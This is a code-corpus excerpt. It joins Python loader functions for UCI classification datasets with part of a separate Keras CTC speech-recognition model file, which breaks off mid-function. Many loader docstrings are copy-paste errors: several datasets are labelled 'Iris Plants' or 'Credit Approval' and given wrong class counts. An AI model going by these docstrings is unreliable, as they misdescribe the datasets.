trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data,
target=normalizeLabels(target),
# last column is target value
feature_names=feature_names[:-1],
DESCR=descr_text,
filename=data_file_name)
def load_iris(return_X_y=False):
"""Load and return the Iris Plants Dataset (classification).
================= =====================
Classes 3
Samples per class [50,50,50]
Samples total 150
Dimensionality 4
Features int, float, positive
================= =====================
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of the dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'iris.rst')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'iris.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=int)
temp = next(data_file) # names of features
feature_names = np.array(temp)
classes = []
for i, d in enumerate(data_file):
data[i] = np.asarray(d[:-1], dtype=np.float64)
if d[-1] in classes:
index = classes.index(d[-1])
target[i] = np.asarray(index, dtype=int)
else:
classes.append(d[-1])
target[i] = np.asarray(classes.index(d[-1]), dtype=int)
trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data,
target=normalizeLabels(target),
# last column is target value
feature_names=feature_names[:-1],
DESCR=descr_text,
filename=data_file_name)
def load_redwine(return_X_y=False):
"""Load and return the Iris Plants Dataset (classification).
================= =====================
Classes 10
Samples per class [1599, 4898]
Samples total 6497
Dimensionality 11
Features int, float, positive
================= =====================
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of the dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'redwine.rst')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'redwine.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=int)
temp = next(data_file) # names of features
feature_names = np.array(temp)
for i, d in enumerate(data_file):
data[i] = np.asarray([np.float(i) for i in d[:-1]],
dtype=np.float64)
target[i] = np.asarray(d[-1], dtype=int)
trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data,
target=normalizeLabels(target),
# last column is target value
feature_names=feature_names[:-1],
DESCR=descr_text,
filename=data_file_name)
def load_forestcov(return_X_y=False):
"""Load and return the Iris Plants Dataset (classification).
================= =====================
Classes 7
Samples per class [211840,283301,35754,
2747,9493,17367,20510,0]
Samples total 581012
Dimensionality 54
Features int, float, positive
================= =====================
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of the dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'forestcov.rst')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'forestcov.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=int)
temp = next(data_file)
# names of features
feature_names = np.array(temp)
for i, d in enumerate(data_file):
data[i] = np.asarray(d[:-1], dtype=np.float64)
target[i] = np.asarray(d[-1], dtype=int)
trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data,
target=normalizeLabels(target),
# last column is target value
feature_names=feature_names[:-1],
DESCR=descr_text,
filename=data_file_name)
def load_letterrecog(return_X_y=False):
"""Load and return the Iris Plants Dataset (classification).
================= =====================
Classes 26
Samples total 20000
Dimensionality 16
Features int, float, positive
================= =====================
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of the dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'letter-recognition.rst')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'letter-recognition.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=int)
temp = next(data_file)
# names of features
feature_names = np.array(temp)
classes = []
for i, d in enumerate(data_file):
data[i] = np.asarray(d[1:], dtype=np.float64)
if d[0] in classes:
index = classes.index(d[0])
target[i] = np.asarray(index, dtype=int)
else:
classes.append(d[0])
target[i] = np.asarray(classes.index(d[0]), dtype=int)
trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data,
target=normalizeLabels(target),
# last column is target value
feature_names=feature_names[:-1],
DESCR=descr_text,
filename=data_file_name)
def load_ecoli(return_X_y=False):
"""Load and return the Iris Plants Dataset (classification).
================= =====================
Classes 8
Samples per class [143,77,52,35,20,5,2,2]
Samples total 336
Dimensionality 8
Features int, float, positive
================= =====================
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of the dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'ecoli.rst')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'ecoli.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=int)
temp = next(data_file) # names of features
feature_names = np.array(temp[1:])
classes = []
for i, d in enumerate(data_file):
data[i] = np.asarray([float(i) for i in d[1:-1]], dtype=np.float64)
if d[-1] in classes:
index = classes.index(d[-1])
target[i] = np.asarray(index, dtype=int)
else:
classes.append(d[-1])
target[i] = np.asarray(classes.index(d[-1]), dtype=int)
trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data,
target=normalizeLabels(target),
# last column is target value
feature_names=feature_names[:-1],
DESCR=descr_text,
filename=data_file_name)
def load_vehicle(return_X_y=False):
"""Load and return the Iris Plants Dataset (classification).
================= =====================
Classes 4
Samples per class [240,240,240,226]
Samples total 846
Dimensionality 18
Features int, float, positive
================= =====================
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of the dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'vehicle.doc')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'vehicle.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=int)
temp = next(data_file) # names of features
feature_names = np.array(temp[1:])
classes = []
for i, d in enumerate(data_file):
data[i] = np.asarray(d[:-1], dtype=np.float64)
if d[-1] in classes:
index = classes.index(d[-1])
target[i] = np.asarray(index, dtype=int)
else:
classes.append(d[-1])
target[i] = np.asarray(classes.index(d[-1]), dtype=int)
trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data,
target=normalizeLabels(target),
# last column is target value
feature_names=feature_names[:-1],
DESCR=descr_text,
filename=data_file_name)
def load_segment(return_X_y=False):
"""Load and return the Credit Approval prediction dataset (classification).
================= =====================
Classes 7
Samples per class [383, 307]
Samples total 2310
Dimensionality 19
Features int, float, positive
================= =====================
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of adult csv dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'segment.doc')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'segment.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=np.int64)
temp = next(data_file) # names of features
feature_names = np.array(temp)
for i, d in enumerate(data_file):
try:
data[i] = np.asarray([np.float(i) for i in d[:-1]],
dtype=np.float64)
except ValueError:
print(i, d[:-1])
target[i] = np.asarray(d[-1], dtype=np.int64)
trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data,
target=normalizeLabels(target),
# last column is target value
feature_names=feature_names[:-1],
DESCR=descr_text,
filename=data_file_name)
def load_satellite(return_X_y=False):
"""Load and return the Credit Approval prediction dataset (classification).
================= =====================
Classes 6
Samples per class 383, 307]
Samples total 6435
Dimensionality 36
Features int, float, positive
================= =====================
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of adult csv dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'satellite.doc')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'satellite.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=np.int64)
temp = next(data_file) # names of features
feature_names = np.array(temp)
for i, d in enumerate(data_file):
try:
data[i] = np.asarray(d[:-1], dtype=np.float64)
except ValueError:
print(i, d[:-1])
target[i] = np.asarray(d[-1], dtype=np.int64)
trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data,
target=normalizeLabels(target),
# last column is target value
feature_names=feature_names[:-1],
DESCR=descr_text,
filename=data_file_name)
def load_optdigits(return_X_y=False):
"""Load and return the Credit Approval prediction dataset (classification).
================= =====================
Classes 10
Samples per class 383, 307]
Samples total 5620
Dimensionality 64
Features int, float, positive
================= =====================
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of adult csv dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'optdigits.rst')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'optdigits.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=np.int64)
temp = next(data_file) # names of features
feature_names = np.array(temp)
for i, d in enumerate(data_file):
try:
data[i] = np.asarray(d[:-1], dtype=np.float64)
except ValueError:
print(i, d[:-1])
target[i] = np.asarray(d[-1], dtype=np.int64)
trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data,
target=normalizeLabels(target),
# last column is target value
feature_names=feature_names[:-1],
DESCR=descr_text,
filename=data_file_name)
def load_credit(return_X_y=False):
"""Load and return the Credit Approval prediction dataset (classification).
================= =====================
Classes 2
Samples per class 383, 307]
Samples total 690
Dimensionality 15
Features int, float, positive
================= =====================
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of adult csv dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'credit.rst')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'credit.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=np.int64)
temp = next(data_file) # names of features
feature_names = np.array(temp)
for i, d in enumerate(data_file):
try:
data[i] = np.asarray(d[:-1], dtype=np.float64)
except ValueError:
print(i, d[:-1])
target[i] = np.asarray(d[-1], dtype=np.int64)
trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data,
target=normalizeLabels(target),
# last column is target value
feature_names=feature_names[:-1],
DESCR=descr_text,
filename=data_file_name)
def load_magic(return_X_y=False):
"""Load and return the Magic Gamma Telescope dataset (classification).
=========================================
Classes 2
Samples per class [6688,12332]
Samples total 19020
Dimensionality 10
Features float
=========================================
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of adult csv dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'magic.rst')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'magic.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=np.str)
temp = next(data_file) # names of features
feature_names = np.array(temp)
for i, d in enumerate(data_file):
data[i] = np.asarray(d[:-1], dtype=np.float64)
target[i] = np.asarray(d[-1], dtype=np.str)
trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data,
target=normalizeLabels(target),
# last column is target value
feature_names=feature_names[:-1],
DESCR=descr_text,
filename=data_file_name)
def load_glass(return_X_y=False):
"""Load and return the Glass Identification Data Set (classification).
===========================================
Classes 6
Samples per class [70, 76, 17, 29, 13, 9]
Samples total 214
Dimensionality 9
Features float
===========================================
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of glass csv dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'glass.rst')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'glass.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=np.int64)
for i, d in enumerate(data_file):
try:
data[i] = np.asarray(d[:-1], dtype=np.float64)
except ValueError:
print(i, d[:-1])
target[i] = np.asarray(d[-1], dtype=np.int64)
trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data, target=normalizeLabels(target),
DESCR=descr_text,
feature_names=['RI: refractive index',
"Na: Sodium (unit measurement: "
"weight percent in corresponding oxide, "
"as are attributes 4-10)",
'Mg: Magnesium ',
'Al: Aluminim',
'Si: Silicon',
'K: Potassium',
'Ca: Calcium',
'Ba: Barium',
'Fe: Iron'])
def load_haberman(return_X_y=False):
"""Load and return the Haberman's Survival Data Set (classification).
==============================
Classes 2
Samples per class [225, 82]
Samples total 306
Dimensionality 3
Features int
==============================
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of haberman csv dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'haberman.rst')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'haberman.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=np.int64)
for i, d in enumerate(data_file):
try:
data[i] = np.asarray(d[:-1], dtype=np.float64)
except ValueError:
print(i, d[:-1])
target[i] = np.asarray(d[-1], dtype=np.int64)
trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data, target=normalizeLabels(target),
DESCR=descr_text,
feature_names=['PatientAge',
'OperationYear',
'PositiveAxillaryNodesDetected'])
def load_mammographic(return_X_y=False):
"""Load and return the Mammographic Mass Data Set (classification).
==============================
Classes 2
Samples per class [516, 445]
Samples total 961
Dimensionality 5
Features int
==============================
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of mammographic csv dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
# fdescr_name = join(module_path, 'descr', 'mammographic.rst')
# with open(fdescr_name) as f:
# descr_text = f.read()
data_file_name = join(module_path, 'data', 'mammographic.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=np.int64)
for i, d in enumerate(data_file):
try:
data[i] = np.asarray(d[:-1], dtype=np.float64)
except ValueError:
print(i, d[:-1])
target[i] = np.asarray(d[-1], dtype=np.int64)
trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data, target=normalizeLabels(target),
DESCR=None,
feature_names=['BI-RADS',
'age',
'shape',
'margin',
'density'])
def load_indian_liver(return_X_y=False):
"""Load and return the Indian Liver Patient Data Set
(classification).
=========================================================
Classes 2
Samples per class [416, 167]
Samples total 583
Dimensionality 10
Features int, float
Missing Values 4 (nan)
=========================================================
Parameters
----------
return_X_y : boolean, default=False.
If True, returns ``(data, target)`` instead of a Bunch object.
See below for more information about the `data` and `target` object.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification targets,
'DESCR', the full description of the dataset,
and 'filename', the physical location of satellite csv dataset.
(data, target) : tuple if ``return_X_y`` is True
"""
module_path = dirname(__file__)
with open(join(module_path, 'data',
'indianLiverPatient.csv')) as csv_file:
data_file = csv.reader(csv_file)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
target_names = np.array(temp[2:])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples, ), dtype=int)
for i, ir in enumerate(data_file):
data[i] = np.asarray(ir[:-1], dtype=np.float64)
target[i] = np.asarray(ir[-1], dtype=int)
# with open(join(module_path, 'descr',
# 'indianLiverPatient.rst')) as rst_file:
# fdescr = [line.decode('utf-8').strip() \
# for line in rst_file.readlines()]
trans = SimpleImputer(strategy='median')
data = trans.fit_transform(data)
if return_X_y:
return data, normalizeLabels(target)
return Bunch(data=data, target=normalizeLabels(target),
target_names=target_names,
DESCR=None,
feature_names=['Age of the patient',
'Gender of the patient',
'Total Bilirubin',
'Direct Bilirubin',
'Alkaline Phosphotase',
'Alamine Aminotransferase',
'Aspartate Aminotransferase',
'Total Protiens',
'Albumin',
'A/G Ratio'])
| 34.326672 | 79 | 0.543002 | 4,519 | 39,510 | 4.605444 | 0.06351 | 0.041899 | 0.026139 | 0.016337 | 0.895781 | 0.893667 | 0.889967 | 0.876321 | 0.85369 | 0.85369 | 0 | 0.016485 | 0.322906 | 39,510 | 1,150 | 80 | 34.356522 | 0.761476 | 0.404353 | 0 | 0.800766 | 0 | 0 | 0.048655 | 0.004332 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.009579 | 0 | 0.111111 | 0.01341 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7473fa73c2d44723610aaa696e1daaeac4c670f3 | 8,261 | py | Python | acoustic/MAXM.py | sailist/ASRFrame | 2fd022c3c00af1d5178dee4b367b2269241bc73c | [
"Apache-2.0"
] | 223 | 2019-07-13T06:31:18.000Z | 2022-03-11T08:23:01.000Z | acoustic/MAXM.py | mayite/ASRFrame | 484cf1ee5beec4c39439de683c5b4c1f1ea3a94a | [
"Apache-2.0"
] | 7 | 2019-12-27T08:48:42.000Z | 2021-09-01T09:45:13.000Z | acoustic/MAXM.py | mayite/ASRFrame | 484cf1ee5beec4c39439de683c5b4c1f1ea3a94a | [
"Apache-2.0"
] | 71 | 2019-07-14T13:14:13.000Z | 2022-03-18T06:58:54.000Z | from core.base_model import AcousticModel
from keras.layers import Dense,Activation,Dropout,Input,Add
from core.ctc_function import CTC_Batch_Cost
from keras import Model
import os
from util.mapmap import PinyinMapper
from util.reader import VoiceDatasetList,VoiceLoader
from feature.mel_feature import MelFeature5
class MCONM(AcousticModel):
'''将每一层的卷积连接起来的一次尝试,Somiao输入法到声学模型的迁移尝试
2019年7月14日14:36:13,thchs30数据集上epoch=55,loss=59,基本无法下降,废弃
'''
def compile(self,feature_shape = (1024,200),label_max_string_length = 32,ms_output_size = 1423):
audio_ipt = Input(name="audio_input", shape=feature_shape)
parent_out = self.parent(audio_ipt,128)
layer_h1 = self.conv1d_layers(audio_ipt,64,8)
layer_h2 = self.cnn1d_cell(64, layer_h1, pool=False)
layer_h3 = Add()([parent_out,layer_h2])
# 64print(layer_h5)
layer_h6 = Dropout(0.2)(layer_h3) # KL,双Dense
layer_h7 = Dense(256, activation="relu", kernel_initializer="he_normal")(layer_h6) # TODO 考虑在这里加Attention
layer_h7 = Dropout(0.2)(layer_h7)
layer_h8 = Dense(ms_output_size)(layer_h7)
y_pred = Activation(activation="softmax")(layer_h8)
y_true = Input(name='label_inputs', shape=[label_max_string_length], dtype='float32')
audio_length = Input(name='audio_length', shape=[1], dtype='int64')
label_length = Input(name='label_length', shape=[1], dtype='int64')
loss_out = CTC_Batch_Cost()([y_true, y_pred, audio_length, label_length])
train_model = Model([audio_ipt, y_true, audio_length, label_length], [loss_out])
train_model.compile(optimizer="adam", loss={"ctc": lambda y_true, y_pred: y_pred})
base_model = Model(audio_ipt, y_pred)
self.built(train_model,base_model)
@staticmethod
def train(datagenes:list, load_model = None):
w, h = 800, 200
max_label_len = 64
dataset = VoiceDatasetList()
x_set, y_set = dataset.merge_load(datagenes)
pymap = PinyinMapper(sil_mode=-1)
vloader = VoiceLoader(x_set, y_set,
batch_size= 16,
feature_pad_len = w,
n_mels=h,
max_label_len=max_label_len,
pymap=pymap,
melf=MelFeature5(),
all_train=False
)
model_helper = MCONM(pymap)
model_helper.compile(feature_shape=(w, h), label_max_string_length=max_label_len, ms_output_size=pymap.max_index+1)
if load_model is not None:
load_model = os.path.abspath(load_model)
model_helper.load(load_model)
model_helper.fit(vloader,epoch=-1,save_step=1000,use_ctc=True)
class MPCONM(AcousticModel):
'''在MCONM的基础上将parent结构改为三层卷积+maxpool的尝试,其余条件相同
2019年7月15日00:30:43,thchs30数据集上epoch=82,loss=14,此时下降已经变得有些困难,等待其继续训练,epoch>150次如果还未拟合则放弃
'''
def compile(self,feature_shape = (1024,200),label_max_string_length = 32,ms_output_size = 1423):
audio_ipt = Input(name="audio_input", shape=feature_shape)
parent_out = self.cnn1d_cell(32,audio_ipt,pool=True)
parent_out = self.cnn1d_cell(64,parent_out,pool=True)
parent_out = self.cnn1d_cell(64,parent_out,pool=True)
layer_h1 = self.conv1d_layers(parent_out,64,8)
layer_h2 = self.cnn1d_cell(64, layer_h1, pool=False)
layer_h3 = Add()([parent_out,layer_h2])
# 64print(layer_h5)
layer_h6 = Dropout(0.2)(layer_h3) # KL,双Dense
layer_h7 = Dense(256, activation="relu", kernel_initializer="he_normal")(layer_h6) # TODO 考虑在这里加Attention
layer_h7 = Dropout(0.2)(layer_h7)
layer_h8 = Dense(ms_output_size)(layer_h7)
y_pred = Activation(activation="softmax")(layer_h8)
y_true = Input(name='label_inputs', shape=[label_max_string_length], dtype='float32')
audio_length = Input(name='audio_length', shape=[1], dtype='int64')
label_length = Input(name='label_length', shape=[1], dtype='int64')
loss_out = CTC_Batch_Cost()([y_true, y_pred, audio_length, label_length])
train_model = Model([audio_ipt, y_true, audio_length, label_length], [loss_out])
train_model.compile(optimizer="adam", loss={"ctc": lambda y_true, y_pred: y_pred})
base_model = Model(audio_ipt, y_pred)
self.built(train_model,base_model)
@staticmethod
def train(datagenes: list, load_model=None):
w, h = 1600, 200
max_label_len = 64
dataset = VoiceDatasetList()
x_set, y_set = dataset.merge_load(datagenes)
pymap = PinyinMapper(sil_mode=-1)
vloader = VoiceLoader(x_set, y_set,
batch_size=16,
feature_pad_len=w,
n_mels=h,
max_label_len=max_label_len,
pymap=pymap,
divide_feature_len=8,
melf=MelFeature5(),
all_train=False
)
model_helper = MPCONM(pymap)
model_helper.compile(feature_shape=(w, h), label_max_string_length=max_label_len,
ms_output_size=pymap.max_index + 1)
if load_model is not None:
load_model = os.path.abspath(load_model)
model_helper.load(load_model)
model_helper.fit(vloader, epoch=-1, save_step=100, use_ctc=True)
class MPBCONM(AcousticModel):
'''在MPCONM的基础上添加BatchNorm'''
def compile(self,feature_shape = (1024,200),label_max_string_length = 32,ms_output_size = 1423):
audio_ipt = Input(name="audio_input", shape=feature_shape)
parent_out = self.cnn1d_cell(32,audio_ipt,pool=True)
parent_out = self.cnn1d_cell(64,parent_out,pool=True)
parent_out = self.cnn1d_cell(64,parent_out,pool=True)
layer_h1 = self.conv1d_layers(parent_out,64,8,batch_norm=True)
layer_h2 = self.cnn1d_cell(64, layer_h1, pool=False)
layer_h3 = Add()([parent_out,layer_h2])
# 64print(layer_h5)
layer_h6 = Dropout(0.2)(layer_h3) # KL,双Dense
layer_h7 = Dense(256, activation="relu", kernel_initializer="he_normal")(layer_h6) # TODO 考虑在这里加Attention
layer_h7 = Dropout(0.2)(layer_h7)
layer_h8 = Dense(ms_output_size)(layer_h7)
y_pred = Activation(activation="softmax")(layer_h8)
y_true = Input(name='label_inputs', shape=[label_max_string_length], dtype='float32')
audio_length = Input(name='audio_length', shape=[1], dtype='int64')
label_length = Input(name='label_length', shape=[1], dtype='int64')
loss_out = CTC_Batch_Cost()([y_true, y_pred, audio_length, label_length])
train_model = Model([audio_ipt, y_true, audio_length, label_length], [loss_out])
train_model.compile(optimizer="adam", loss={"ctc": lambda y_true, y_pred: y_pred})
base_model = Model(audio_ipt, y_pred)
self.built(train_model,base_model)
@staticmethod
def train(datagenes: list, load_model=None):
w, h = 1600, 200
max_label_len = 64
dataset = VoiceDatasetList()
x_set, y_set = dataset.merge_load(datagenes)
pymap = PinyinMapper(sil_mode=-1)
vloader = VoiceLoader(x_set, y_set,
batch_size=16,
feature_pad_len=w,
n_mels=h,
max_label_len=max_label_len,
pymap=pymap,
divide_feature_len=8,
melf=MelFeature5(),
all_train=False
)
model_helper = MPBCONM(pymap)
model_helper.compile(feature_shape=(w, h), label_max_string_length=max_label_len,
ms_output_size=pymap.max_index + 1)
if load_model is not None:
load_model = os.path.abspath(load_model)
model_helper.load(load_model)
